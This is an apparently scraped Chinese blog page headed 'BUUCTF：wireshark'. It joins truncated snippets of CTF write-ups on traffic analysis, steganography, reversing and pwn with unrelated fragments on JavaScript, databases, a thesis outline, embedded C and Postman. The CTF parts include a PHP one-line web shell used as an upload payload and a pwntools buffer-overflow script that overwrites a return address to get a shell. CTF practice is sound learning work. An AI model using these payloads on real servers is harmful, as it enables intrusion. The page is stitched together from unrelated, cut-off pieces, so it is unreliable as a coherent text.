BUUCTF：wireshark

CTF三年小白，随笔一写

Wireshark软件安装软件下载路径：wireshark官网。按照系统版本选择下载，下载完成后，按照软件提示一路Next安装。说明：如果你是Win10系统，安装完成后，选择抓包但是不显示网卡，下载win10pcap兼容性安装包。下载路径：win10pcap兼容性安装包Wireshark 开始抓包示例先介绍一个使用wireshark工具抓取ping命令操作的示例，让读者可以先上手操作感受一下抓包的

安装yum install wireshark使用tshark -f 'udp dst port 5062 or udp dst port 7100' -w 1.pcap-f  过滤2个目标端口，目标端口可以是本机端口或他机端口。-w 保存到文件

https://buuoj.cn/challenges#[BUUCTF%202018]Onli

[极客大挑战 2019]Upload看到后的第一印象肯定是先上传图片马试试<?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?>构造的语句中不能带有<?

我的第一个pwn题。原理：修改返回地址以达到获得shell的目的。根据栈结构，我们将char s[]的15个字节填充上，再填充Caller‘s rbp 的8个字节即可到达Return address。脚本如下：from pwn import*p = remote("ip地址",port)payload = 'A'*15+'B'*8+p64(0x401186)p.sendline(payload)p

https://buuoj.cn/challenges#hashcatXML文件，添加文件后缀为ppt，有加密使用Accen

题目地址：https://buuoj.cn/challenges#greatescape下载附件得到一个流量包，追中TCP流，在tcp.stream eq 18，发现ssc

题目地址：https://buuoj.cn/challenges#snakebinwalk分析发现图片中隐写了压缩包，使用forem

题目地址：https://buuoj.cn/challenges#LSB题目提示是：LSB使用stegsolve打开，在Red plane 0、Grenn plane 0、Blue plane0通道发现图片的上方好有东西Analyse->Data Extract调整至如下，发现这是一张图片，Save Bin保存为flag.png`cumtc

题目地址：https://buuoj.cn/challenges#ningenbinwalk分析，发现隐写了zip，binwalk -e 分离出压

题目地址：https://buuoj.cn/challenges#%E5%A4%A7%E7%99%BD根据题目提示，可能是图片错误修改高度和宽度相同flag{Hell1_d4_ba1}

题目地址：https://buuoj.cn/challenges#FLAGstegsolve打开发现在LSB的RGB这是个zip文件，Save Bin保存为flag.zipflag.zip解压是虽然会提示文件格式有损坏，但是没有关系，照样解压1是个ELF文件 使用IDA打开，或者在Linux先直接运行，即可得到flaghctf{dd0gf4c3tok3yb0ard4g41n~~~}

题目地址：https://buuoj.cn/challenges#easycap题目附件是流量包，使用wireshark打开，全是tcp的包，追踪流量即可发现flagflag{385b87afc8671dee07550290d16a8071}

题目地址：https://buuoj.cn/challengeion checksum: 0x75f9.

wireshark 这题看名字就知道是流量题，下载后使用wireshark打开，看提示是登陆，所以进去过滤http流量包，找到这个login比较明显，进来就可以看到flag ...

点开要求输入密码，拖入IDA查看，查看strings看样子没有加壳，进入passwd字符查看 输入一个长度为6的字符串，atoi函数是一个把字符串转换成整数型的函数，strcat在6位字符串后加上@DBApp 猜测sub_40100A是一个加密函数 进入查看 查看https://docs.micro ...

拖入IDA64查看伪代码 1 unsigned __int64 Decry() 2 { 3 char v1; // [rsp+Fh] [rbp-51h] 4 int v2; // [rsp+10h] [rbp-50h] 5 int v3; // [rsp+14h] [rbp-4Ch] 6 int i ...

starctf_2019_babyshell 考点：01是代码也可以是数据，所以只读数据段的数据拼接可以执行sys_read,利用IDA的转代码（字母C）来将只读数据段转成代码如下：

!strncmp(v6, global, 0x21uLL) 其函数声明为int strncmp ( const char * str1, const char * str2, size_t n ); 功能是把 str1 和 str2 进行比较，最多比较前 n 个字节 若str1与str2的前n个字符 ...

如何使用JavaScript遍历数组中的所有条目？ 我以为是这样的： forEach(instance in theArray) 其中theArray是我的数组，但这似乎是不正确的。 #1楼 如果您不介意清空数组： var x; while(x = y.pop()){ alert(x); //do something } x将包含y的最后一个值，并将其从数组中删除。 您还可以

目 录 目 录 III 第一章 概述 1 1.1研究背景 1 1.2开发意义 1 1.3研究现状 1 1.4研究内容 1 1.5论文结构 2 第二章 开发技术介绍 1 2.1系统开发平台 1 2.2平台开发相关技术 1 2.2.1Java语言简介 1 2.2.2mysql数据库介绍 2 2.2.3MySQL环境配置 2 2.2.4B/S架构 2 2.2.5JSP技术介绍 3 第三章 系统分析 1

1数据库的概述数据库 即存储数据的“仓库”，其本质是一个文件系统。它保存了一系列有组织的数据。数据库管理系统 是一种操纵和管理数据库的大型软件，用于建立、使用和维护数据库，对数据库进行统一管理和控制。用户通过数据库管理系统访问数据库中表内的数据。SQL结构化查询语言 数据库通信的语言。 == 关系形数据库（RDBMS）== 行(row) 和 列(column) 的形式存储数据，以便于用户理解。SQ

 视频演示 #define ROTATE_A PAin(2) #define ROTATE_B PAin(3) s16 DATA=0; void EXTI2_IRQHandler(void) { if(EXTI_GetITStatus(EXTI_Line2) != RESET) { if(ROTATE_A!=ROTATE_B) { DATA

postman是一款支持http协议的接口调试与测试工具，其主要特点就是功能强大，使用简单且易用性好 。无论是开发人员进行接口调试，还是测试人员做接口测试，postman都是我们的首选工具之一 。那么接下来就介绍下postman到底有哪些功能，它们分别都能干些什么 。下面先通过一张图来直观的来看下postman中所包含的功能 。 当然，以上功能也只是展示了postman的一部分功能，为了